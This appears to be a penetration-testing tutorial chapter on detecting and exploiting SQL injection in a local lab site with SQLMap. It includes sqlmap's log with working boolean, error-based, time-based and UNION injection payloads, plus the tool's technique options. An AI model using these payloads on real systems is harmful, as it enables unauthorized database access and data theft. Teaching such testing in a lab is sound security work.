In this chapter, we will be going to detect and identify whether the tested site is vulnerable or not. If the site is vulnerable, then we will be going to exploit it via SQLMap.
Let me first demonstrate the first test bed.
Click on GET Error-based Single-quoter-String to get our first test bed site.
Input the ID as a parameter with the numeric value, as following in below screenshot:
It takes a GET
parameter named id and displays username and password values for the same:
This URL displayed the value for the first user.
Similarly, if we increment the ID parameter, we'll notice different usernames
and their corresponding password pairs.
The most benign check for SQL injection is nothing other
than adding a quotation mark ( ' ) after the suspect parameter. This actually tries
to break the application's SQL query by adding a stray string character.
Now
let's try that out:
As expected, we get a classic MariaDB error which
tells us that something is odd, and possibly an error-based SQL injection.
Let's fire up SQLMap and try to figure out whether it is
exploitable or not.
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:32:01 /2022-12-06/
[12:32:02] [INFO] testing connection to the target URL
[12:32:03] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:32:03] [INFO] testing if the target URL content is stable
[12:32:03] [INFO] target URL content is stable
[12:32:03] [INFO] testing if GET parameter 'id' is dynamic
[12:32:03] [INFO] GET parameter 'id' appears to be dynamic
[12:32:03] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:32:03] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[12:32:03] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
SQLMap throws an excellent output suggesting that the id is
vulnerable to an error-based SQL injection, and the backend Database is MySQL.
[12:32:03] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
As you may have understood, -u is used to supplying the URL to SQL Map, and
the GET parameter is selected from it. Still, in case there are multiple
parameters to look into, then we can use -p and then specify the
parameter name, to explicitly specify which parameter to look at in SQL Map.
As a bonus, it also alerts us that the parameter is
susceptible to XSS vulnerability as well.
[12:32:03] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
If you suspect, your backend database is not MySQL, then type y to continue. It is a good practice to check it.
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
On completion, it will produce output that the suspected URL is vulnerable to the id parameter. Type Y to continue if there are any.
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=4' AND 5978=5978 AND 'yBkh'='yBkh
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=4' AND (SELECT 7029 FROM(SELECT COUNT(*),CONCAT(0x71766b7871,(SELECT (ELT(7029=7029,1))),0x71716a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pqQq'='pqQq
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=4' AND (SELECT 2736 FROM (SELECT(SLEEP(5)))haHG) AND 'MBbF'='MBbF
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-6733' UNION ALL SELECT NULL,NULL,CONCAT(0x71766b7871,0x6e7a796f655346646f704c4c6167654b6c666177674254694d6456497a5851767371434e5467736a,0x71716a6a71)-- -
---
[12:32:39] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.6.39, Apache 2.4.37
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:32:39] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.108'
[*] ending @ 12:32:39 /2022-12-06/
When the detection phase is over, the output also shows us
the variety of ways in which we can exploit this flaw. As a result, you can see
the detailed output, consisting of exploitation choices, the payload used to
test as well as the backend architecture of the web application.
Now, it is obvious that we can exploit this using the
error-based technique. But before that, I'll navigate you through different
types of settings we can use.
SQL Map supports the use of a specific technique of
exploitation by using the --technique command line switch.
Letter
Letter Technique
B
Boolean-based blind or simply blind injection
E
Error-based injection
U
UNION-query based injection
S
Stacked queries
T
Time-based injection
Q
Inline queries
By default, SQLMap selects the appropriate usable
technique; but it is a good idea to manually force SQL Map into one of these
options if there are anomalies or if SQLMap is unable to dump the data
automatically.
If you want to manually force SQLMap into one of these
options, then you have to specify it while running a command.
.png)
.png)
.png)
.png)
.png){kind=small}
.png)
.png)
